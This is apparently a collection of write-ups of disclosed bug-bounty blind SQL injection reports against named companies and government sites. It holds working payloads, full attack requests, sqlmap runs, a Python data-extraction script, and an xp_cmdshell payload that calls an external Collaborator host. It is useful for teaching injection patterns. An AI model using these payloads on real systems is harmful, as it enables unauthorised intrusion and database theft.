SQLI Write-ups

1. Uber Blind SQLI

Uber disclosed on HackerOne: SQL Injection on...HackerOne

After subscribing to Uber in China, an advertisement was sent to the associated email account. The unsubscribe link in the email is different than the normal Uber unsubscribe link.

http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==

The URL parameter p contains a Base64 encoded JSON object seen below (with the added payload):

{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}

The original request would look like this:

{"user_id": "5755", "receiver": "orange@mymail"}

By issuing the request with the " and sleep(12)=1" payload, the server sleeps for 12 seconds.

Orange Tsai wrote a payload to return the Username and Database of the Database where the Blind SQLI is occurring.

import json
import string
import requests
from urllib import quote
from base64 import b64encode

base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}

for l in range(0, 30):
    for i in 'i'+base:
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
        new_payload = json.dumps(payload)
        new_payload = b64encode(new_payload)
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))

        if len(r.content)>0:
            print i,
            break

2. Starbucks

Starbucks disclosed on HackerOne: Time-based Blind SQLi on...HackerOne

Researcher discovered Time Based Blind SQLi on the news.starbucks.com domain. The vulnerability exists on a HTTP POST request to the home path of the Starbucks domain in the group_id body parameter. The request with payload is illustrated below:

POST / HTTP/1.1
Host: news.starbucks.com
Connection: close
Content-Length: 81
Cache-Control: max-age=0
Origin: https://news.starbucks.com
Content-Type: application/x-www-form-urlencoded

ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(1=1,SLEEP(1),0) AND group_id='1

The request successfully delays the server response time.

The researcher also illustrates how to determine the database version through the following requests using curl:

time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='5',SLEEP(1),0) AND group_id='1" https://news.starbucks.com

real    0m4.945s

time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='4',SLEEP(1),0) AND group_id='1" https://news.starbucks.com

real    0m1.005s

You can see the response time for version 5 is greater than version 4 meaning the sleep command executed on the first request (version 5) proving the database version is 5.

Exploiting the vulnerability using SQLMap and retrieving the available databases and DBMS info as a PoC:

The researcher thankfully provided a detailed full write-up here https://timeofcheck.com/time-based-blind-sqli-on-news-starbucks-com/.

3. U.S. DoD (SQLMAP Exploiting Blind SQLi)

U.S. Dept Of Defense disclosed on HackerOne: SQL injection on...HackerOne

The URL https://redacted.com/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1 contains a URL parameter c0-param that is vulnerable to Blind SQLi.

In the example below, the researcher uses SQLMap to exploit the vulnerability. On line 68 below, SQLMap displays the database type as a Proof of Concept.

root@kali:~/bugbounty# sqlmap -u "https://████/█████████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1*"
         _
 ___ ___| |_____ ___ ___  {1.0.8.2#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:21:54

custom injection marking character ('*') found in option '-u'. Do you want to pry
[20:22:03] [INFO] testing connection to the target URL
[20:22:04] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:04] [INFO] testing if the target URL is stable
[20:22:05] [INFO] target URL is stable
[20:22:05] [INFO] testing if URI parameter '#1*' is dynamic
[20:22:05] [WARNING] URI parameter '#1*' does not appear dynamic
[20:22:05] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Oracle')
[20:22:05] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:20] [WARNING] reflective value(s) found and filtering out
[20:22:21] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:22:23] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:22:24] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:50] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:10] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:33] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[20:23:43] [INFO] URI parameter '#1*' is 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' injectable 
[20:23:43] [INFO] testing 'Oracle inline queries'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:23:43] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (heavy query)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind'
[20:23:45] [INFO] testing 'Oracle OR time-based blind'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle OR time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[20:24:16] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[20:24:46] [INFO] URI parameter '#1*' appears to be 'Oracle AND time-based blind (heavy query)' injectable 
[20:24:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 418 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
    Payload: https://█████:443/█████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 9965=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9965=9965) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)))-- Goij

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: https://██████:443/████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 4917=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- vKNF
---
[20:34:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[20:34:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/██████████'

[*] shutting down at 20:34:42

4. QIWI SQLi Out of Band Interaction

https://hackerone.com/qiwi?type=teamhackerone.com

Quoting the Researcher:

The API interface on https://contactws.contact-sys.com:3456/ accepts a <REQUEST/> body to interact with the server's AppServ object. Because of insufficient input validation, an attacker can abuse the SCEN_ID parameter to inject arbitrary SQL statements into the WHERE clause of the underlying SQL statement. This leads to a blind SQL injection vulnerability, which in turn leads to Remote Code Execution on the server.

The unedited HTTP POST Request

POST / HTTP/1.1
Host: contactws.contact-sys.com:3456
Content-Type: application/xml
Content-Length: 185

<REQUEST OBJECT_CLASS="TScenObject" ACTION="ScenObjects" SCEN_ID="33*" ExpectSigned="No" INT_SOFT_ID="DA61D1CE-757F-44C3-B3F7-11A026C37CD4" POINT_CODE="tzhr" lang="en"></REQUEST>

The researcher makes use of Burp Suite's Collaborator which is a network service tool that can be used to detect out-of-band SQL injection. In short, this works by providing a unique subdomain which is used in the payload. Using the unique subdomain in the payload, the backend server reaches out to the Burp Collaborator server as it does a DNS lookup of the subdomain. There are other uses for the Burp Collaborator, such as out-of-band exfiltration, but this is enough of a PoC to prove that the server is vulnerable to Blind out-of-band SQLi.

Modifying the SCEN_ID body parameter to use xp_cmdshell and ping the Burp Suite Collaborator server with the unique subdomain generated (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net). This will make a DNS request to the burpcollaborator.net server with the unique subdomain.

POST / HTTP/1.1
Host: contactws.contact-sys.com:3456
Content-Type: application/xml
Content-Length: 342

<REQUEST OBJECT_CLASS="TScenObject" ACTION="ScenObjects" SCEN_ID="33; DECLARE @command varchar(255); SELECT @command='ping yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'" ExpectSigned="No" INT_SOFT_ID="DA61D1CE-757F-44C3-B3F7-11A026C37CD4" POINT_CODE="tzhr" lang="en"></REQUEST>

Issuing the request will successfully cause the web server to do a DNS lookup of the domain. The server can be seen reaching out to Burp Suite's Collaborator with the unique subdomain (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net).

The researcher also used SQLMap to exploit this vulnerability and retrieve the database name. The sqlitest.txt file is the above HTTP POST request.

sqlmap -r sqlitest.txt --batch --current-db --force-ssl

5. Cookie Parameter Blind SQLI

MTN Group disclosed on HackerOne: SQL Injection on cookie parameterHackerOne

The lang cookie parameter was found to be vulnerable to SQLI. The request was sent with the following payload, and the server will delayed the response:

%2b(select*from(select(sleep(20)))a)%2b

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en%2b(select*from(select(sleep(20)))a)%2b; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

6. LocalTapiola URL Parameter

https://hackerone.com/reports/200818hackerone.com

The HTTP URL redId parameter on http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674 is vulnerable to Blind SQLi. The researcher illustrates this through the use of SQLMap.

~/sqlmap# ./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId

.. snip ..

GET parameter 'regId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:

Parameter: regId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regId=478836614) AND 5454=5454 AND (5202=5202&locationId=464559674

[17:38:22] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache
back-end DBMS: PostgreSQL

7. LocalTapiola URL Parameter 2

https://hackerone.com/reports/164739hackerone.com

The following payload is URL encoded and submitted in the URL blobwhere parameter:

' AND 5851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5) AND 'bar'='bar

Using Curl the researcher demonstrates the delay in response time of 5 seconds.

15:25 ~: time curl "http://www.lahitapiola.fi/cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1310812269330%27%20AND%205851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5)%20AND%20%27bar%27=%27bar" -O /dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1019  100  1019    0     0    196      0  0:00:05  0:00:05 --:--:--   256
curl: (3) <url> malformed

real    0m5.186s
user    0m0.004s
sys 0m0.008s

8. RocketChat URL Parameter

Rocket.Chat disclosed on HackerOne: Blind SQL injection in...HackerOne

The new URL parameter was found to be vulnerable to Blind SQLI.

Payload:

=(select*from(select(sleep(5)))a)&ref=&domain=dorgam

Request:

https://stats2.agilecrm.com/addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam

#Output presumably from sqlmap 
Database version: MySQL 5.0.12
Server hostname: localhost
Databases: information_schema; mysql; performance_schema; stats
Stats: 3; persons; map.

9. Blind SQLi URL Path

Hanno's projects disclosed on HackerOne: blind sql injectionHackerOne

The path gets filtered on the backend as a tag and upon retrieving the request it searches for the tag. The path https://betterscience.org/plugin/tag/ filters anything prepended to the URL path as a tag and displays the output. By issuing it a specifically crafted SQL request it is possible to trigger Blind SQLi.

Payload:

if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22

Request:

GET /plugin/tag/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://betterscience.org:443/
Cookie: s9y_556bfeaw76g87a7643w7826384391f0=34583y4kj5ger78af32jh54g24; serendipity[url]=1; serendipity[name]=dxctfnid; serendipity[email]=bugbountyspam%40protonmail.com; serendipity[remember]=checked%3D%22checked%22
Host: betterscience.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

10. JSON Post Parameter

Informatica disclosed on HackerOne: [informatica.com] Blind SQL...HackerOne

The researcher included a video PoC in his description as well https://www.youtube.com/watch?v=m5J7Rs4O3do&ab_channel=TheKonquerRor.

HTTP JSON POST parameter docid is vulnerable to Blind SQLi.

Quoting qonqi:

for a TRUE query we get - {"d":"3"} for a FALSE - {"d":""} for a Syntax error - {"Message":"There was an error processing the request.","StackTrace":"","ExceptionType":""}

so using this blind technique we can extract the data from Database

examples

docId:"1 and (select substring(@@version,1,1))='M'" - true docId:"1 and (select substring(@@version,2,1))='i'" - true docId:"1 and (select substring(@@version,3,1))='c'" - true

docId:"1 and (select substring(@@version,22,1))='2'" docId:"1 and (select substring(@@version,23,1))='0'" docId:"1 and (select substring(@@version,24,1))='0'" docId:"1 and (select substring(@@version,25,1))='8'"

and so on.. . So we have a MS SQL Server 2008

POST /_vti_bin/RatingsCalculator/RatingsCalculator.asmx/CalculateRatings HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.17
Host: kb-test.informatica.com
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: https://kb-test.informatica.com/KBExternal/pages/infasearch.aspx?k=pew
Cookie: ASP.NET_SessionId=03khmmjpaxvcos45opn2kg55; BIGipServerkb-test-pool=2670002442.22811.0000; WebAnalyticsSessionId2=b600796d-cd0e-4797-9610-872c18063793; kbemail=; mkt_cookie=anonymous; __cdrop=.D1P9XM.; _ga=GA1.2.1961398489.1453319834; _mkto_trk=id:189-ZHZ-794&token:_mch-informatica.com-1452163097365-89988; s_vnum=1458351793680%26vn%3D1; gpv_p14=welcome%20page%3Awelcome; s_ppv=-%2C76%2C76%2C947; s_cc=true; gpv2=kb%3Aproddocsearch; s_nr=1455762795883-Repeat; s_invisit=true; s_sq=informatica-mysupport-dev%3D%2526pid%253Dhttps%25253A%25252F%25252Fkb.informatica.com%25252F_layouts%25252FProductDocumentation%25252FPage%25252FProductDocumentSearch.aspx%2526oid%253Dhttps%25253A%25252F%25252Fkb.informatica.com%25252F_layouts%25252FProductDocumentation%25252FPage%25252FProductDocumentSearch.aspx%252523%2526ot%253DA; wooTracker=vALSmwIXvuQp; AMCV_C0B11CFE5330AAFD0A490D45%40AdobeOrg=793872103%7CMCIDTS%7C16850%7CMCMID%7C49728577452301121918884624029572688913%7CMCAAMLH-1456367601%7C6%7CMCAAMB-1456367601%7CNRX38WO0n5BH8Th-nqAG_A%7CMCAID%7CNONE; mbox=check#true#1455762863|session#1455762802845-749291#1455764663
Connection: Keep-Alive
Content-Length: 117
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8

{docId:"1 and (select substring(@@version,1,1))='M'", docTitle:'Getting an error while trying to import WSDL as...' }

11. Tube8

https://hackerone.com/reports/363815hackerone.com

Company summary:

Researcher found a blind SQL injection in the profile comment Like functionality, executing on the second request made for a given comment (dislikes).

URL and Payload:

https://www.tube8.com/ajax2/likeProfileComment/?profile_id=70418291&comment_id=291751-benchmark(1000000000,1-1)&hash=f42ffae0449536cfd0419826f3adf136

Issuing the request successfully delays the response.

12. Tube8 2

https://hackerone.com/reports/295841hackerone.com

The topsort URL parameter on https://www.tube8.fr/ajax-hof/?toplimit=2&topsort=followers+or+sleep(0.000000001) is vulnerable to Blind SQLi.

The request below contains the payload in the URL parameter. The researcher stated that any larger value in the sleep function makes the application timeout, possibly due to the injection point being in a WHERE statement which is executing for every record in the table.

13. DoD URL Parameter

U.S. Dept Of Defense disclosed on HackerOne: SQL Injection in the...HackerOne

There is a HTTP GET URL parameter that is vulnerable to Blind SQL Injection at https://███/pubs/get_publications.php, pub_group_id is the parameter.

Payload below contains a 5 second delay in response in the pub_group_id parameter. Issuing the request successfully delays the response by 5 seconds.

GET /pubs/get_publications.php?pub_group_id=wrtqvasi10rc19j1'%2b(select*from(select(sleep(5)))a)%2b'&rno86qi4=1 HTTP/1.1
Host: █████
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://█████/pubs/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,ru;q=0.9,en-US;q=0.8,uk;q=0.7
Cookie: _ga=GA1.2.1697249984.1548431559; __utma=161700579.1697249984.1548431559.1548902867.1548902867.1; __utmz=161700579.1548902867.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); _test_cookie=0

The researcher used SQLMap to exploit the vulnerability. The test.txt file contains the above HTTP GET request (without the payload).

sqlmap.py -r test.txt --dbms=mysql --technique=T -p pub_group_id --banner --force-ssl --level=5

14. User-Agent HTTP Header

GSA Bounty disclosed on HackerOne: SQL injection in...HackerOne

Researcher discovered the labs.data.gov website has a route /dashboard/datagov/csv_to_json that is vulnerable to Blind SQLi on the User-Agent HTTP Header.

Appending the following payload to the User-Agent Header delays the response time by 25 seconds:

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

The appended payload can be seen in the request below. Issuing the response below, the researcher successfully illustrated that the server takes 25 seconds to respond.

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

15. DoD URL Parameter

U.S. Dept Of Defense disclosed on HackerOne: SQL injection on the...HackerOne

The doc_id URL Parameter on the /library.php route was found to be vulnerable to Blind SQLi. Issuing the request below makes the server delay it's response by 5 seconds. The payload 1 AND (SELECT * FROM (SELECT(SLEEP(1)))WUeh) is URL encoded and placed into the doc_id URL parameter.

GET /library.php?path=test&doc_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(1)))WUeh) HTTP/1.1
Host: ██████
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en,ru;q=0.9,en-US;q=0.8,uk;q=0.7
Cookie: _ga=GA1.2.1697249984.1548431559

16. DoD

U.S. Dept Of Defense disclosed on HackerOne: SQL Injection on...HackerOne

Researcher discovered the countID URL parameter on the route https://www.xn--4zhaa/public/saveCount.cfm?countID=4 is vulnerable to Blind SQLi. Illustrated below, the researcher uses SQLMap to exploit the vulnerability and retrieve the banner for the database.

python sqlmap.py -u https://www.xn--4zhaaaaaaaaa/public/saveCount.cfm?countID=4 --level=3 --risk=3

#Output 
Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64&
Mar 19 2015 12:32:14
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)

17. DoD

U.S. Dept Of Defense disclosed on HackerOne: SQL injection on █████...HackerOne

The route https://███/hro/html/tech.cfm?Sort=SLEEP(25)&ThisType=3 contains the URL parameter S Sort which is vulnerable to Blind SQLi. Issuing the request to the URL with the payload SLEEP(25) will delay the servers response by 25 seconds.

18. HTTP GET URL Parameter

https://hackerone.com/reports/786044hackerone.com

Researcher discovered URL parameter that is vulnerable to Blind SQLi. The payload can be seen in the parameter.

https://windows10.hi-tech.mail.ru/api/tweets?city_id=(select(0)from(select(sleep(25)))v)

Request:

GET /api/tweets?city_id=(select(0)from(select(sleep(25)))v) HTTP/1.1
Host: windows10.hi-tech.mail.ru
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: V████████
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Thu, 30 Jan 2020 10:05:07 GMT
Content-Type: text/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 50

{"status":"ok","last_id":0,"data":[],"total":"0"}

19. DoD POST Body Parameter

U.S. Dept Of Defense disclosed on HackerOne: Blind SQL injection on...HackerOne

HTTP POST request rememail body parameter is vulnerable to Blind SQLi.

POST /elist/viewem6.php HTTP/1.1
Host: ████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://███████/elist/email_escribe.php?type=R
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Cookie: v1st=A9532F64A9E711AF; PHPSESSID=1796d85a30d3addf5934c1f0fafec529
Connection: close
Upgrade-Insecure-Requests: 1

rememail=test@att.net'%2b(select*from(select(sleep(2)))a)%2b'

The researcher illustrates how to retrieve the database version through blind SQLi. This will either create a 2 second delay if true, if not the response will be immediate. This can used to iterate over each possible version number to detect which version is currently in use.

rememail=test@att.net'%2bIF(MID(@@version,1,1)=4,sleep(2),1)=2%2b'

Incrementing the number before sleep:

rememail=test@att.net'%2bIF(MID(@@version,1,1)=5,sleep(2),1)=2%2b'

20. OLX Body Parameter

https://hackerone.com/reports/639876hackerone.com

The /ajax/buybundle/getbundle/ route contains a HTTP POST body parameter location that is vulnerable to Blind SQLi.

POST /ajax/buybundle/getbundle/ HTTP/1.1
Host: www.olx.co.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3790.0 Safari/537.36
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 39
DNT: 1
Connection: close
Referer: https://www.olx.co.id/iklanku/belikuota/
Cookie: PHPSESSID=29fehe5f8eaduvg5cudichht36; mobile2=desktop; onap=16bdd5da313x5c4483aa-1-16bdd5da313x5c4483aa-59-1562791780; test_idGeo=a; gcl_au=1.1.80001931.1562787033; from_detail=0; ins-mig-done=1; G_ENABLED_IDPS=google; remember_login=96017983%3B951881f63b1236c7a932ee3f8d003d03; user_id=96017983; last_paidads_provider=payment_chk_0; observed5_id=234772604; observed5_sec=6YnW9t9QjecVgj%2F4OE3FUg%3D%3D; last_locations=212-0-0-Malang+Kota-Jawa+Timur-malang%3Akota; my_city_2=212_0_0_Malang+Kota_0_Jawa+Timur_malang%3Akota; __zlcmid=tDiNNPSGTQH0Zc; observed5_view=tiles; AWSELB=5BAF4995185E44C89D2195E4E8346CEE56208525AB4040445FB0801930C2BF82238B04C1A2EF855A72733ADF1543A7B8EC357E95F1AD4FA463DCD24B6457F7553116FE4B29

category=86&subcategory=4760&location=(SELECT * FROM (SELECT(SLEEP(5)))a)


#End of HTTP Request 
#Output from researcher 

back-end DBMS is MySQL
web application technology: Apache

available databases [2]:

information_schema
olxid

21. InnoGames

https://hackerone.com/reports/758654hackerone.com

InnoGames URL Pathway was found vulnerable to Blind SQLi.

https://www.innogames.com/'xor(if(now()=sysdate(),sleep(10),0))or'

Extracting database info:

https://www.innogames.com/'xor(if(mid(database(),1,1)=0x41,sleep(63),0))or'

22. Zomato

Eternal disclosed on HackerOne: [www.zomato.com] Blind SQL...HackerOne

HTTP POST Request body parameter res_id was found vulnerable to Blind SQLi, allowing the researcher to extract information from the database.

POST /php/geto2banner HTTP/1.1
Host: www.zomato.com
Connection: close
Content-Length: 73
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en

res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0

23. DoD

U.S. Dept Of Defense disclosed on HackerOne: Blind SQL Injection on...HackerOne

HTTP GET URL parameter t is vulnerable to Blind SQLi on http://www.█████████/viewVideo.asp?t=7.

https://<redacted>.gov/viewVideo.asp?t=pg_sleep(30)--

24. InsideOk

ok.ru disclosed on HackerOne: Blind SQL InjectionHackerOne

Body parameter count vulnerable to Blind SQLi.

POST /api/updateShareCount HTTP/1.1
Host: insideok.ru
Cache-Control: no-cache
Accept: application/json, text/javascript, /; q=0.01
Origin: http://insideok.ru
Referer: http://insideok.ru/lica
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Cookie: session=27e8i3jqiutlk7bd2nmgoftbg0
Accept-Encoding: gzip, deflate
Content-Length: 108
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

type=sharesCountTw&url=http%3a%2f%2finsideok.ru%2flica&count=-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(25))A))